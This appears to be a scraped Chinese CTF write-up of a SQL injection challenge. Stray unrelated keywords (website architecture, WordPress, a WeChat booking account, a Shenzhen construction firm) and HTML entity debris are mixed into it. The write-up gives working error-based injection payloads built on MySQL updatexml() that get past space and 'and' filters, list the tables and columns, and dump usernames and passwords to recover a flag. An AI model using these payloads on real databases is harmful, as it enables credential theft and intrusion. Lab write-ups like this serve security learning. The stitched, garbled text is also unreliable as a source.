大型网站的技术架构问题,wordpress要装在根目录,微信公众号预约,深圳博大建设输入1’ 单引号闭合 进行永真式判断 竟然说我是臭弟弟----八嘎#xff08;肯定是进行了过滤#xff09;
经过手法判断#xff0c;过滤了#xff0c;空格#xff0c;and等报错注入updatexml()
报错注入顾名思义就是#xff0c;通过特殊函数错误使用并使其输出错误结果来获… 输入1’ 单引号闭合 进行永真式判断 竟然说我是臭弟弟----八嘎肯定是进行了过滤
经过手法判断过滤了空格and等报错注入updatexml()
报错注入顾名思义就是通过特殊函数错误使用并使其输出错误结果来获取信息的UPDATEXML() 是 MySQL 数据库中的一个函数它用于修改 XML 文档中的值。这个函数返回修改后的 XML 文档并可以根据指定的 XPath 表达式和新的值来更新 XML 文档中的特定部分。UPDATEXML() 函数的语法如下UPDATEXML(xml_doc, xpath_expr, new_value)
xml_doc要修改的 XML 文档。
xpath_expr用于定位要修改的 XML 文档部分的 XPath 表达式。
new_value要插入到 XML 文档中的新值。查库
空格用绕过
用like绕过1or(updatexml(1,concat(0x7e,database(),0x7e),1))#查表
1or(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())),0x7e),1))#查字段
1or(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like(H4rDsq1)),0x7e),1))#1or(updatexml(1,concat(0x7e,(select(group_concat(username,--,password))from(H4rDsq1)),0x7e),1))#只出现一半的flag使用left和right函数进行一半一半的查询 1or(updatexml(1,concat(0x7e,(select(left(password,30))from(H4rDsq1)),0x7e),1))#1or(updatexml(1,concat(0x7e,(select(right(password,30))from(H4rDsq1)),0x7e),1))#拼接得到完整的flag
flag{b999a4be-8147-468b-8eba-360a077eaef0}
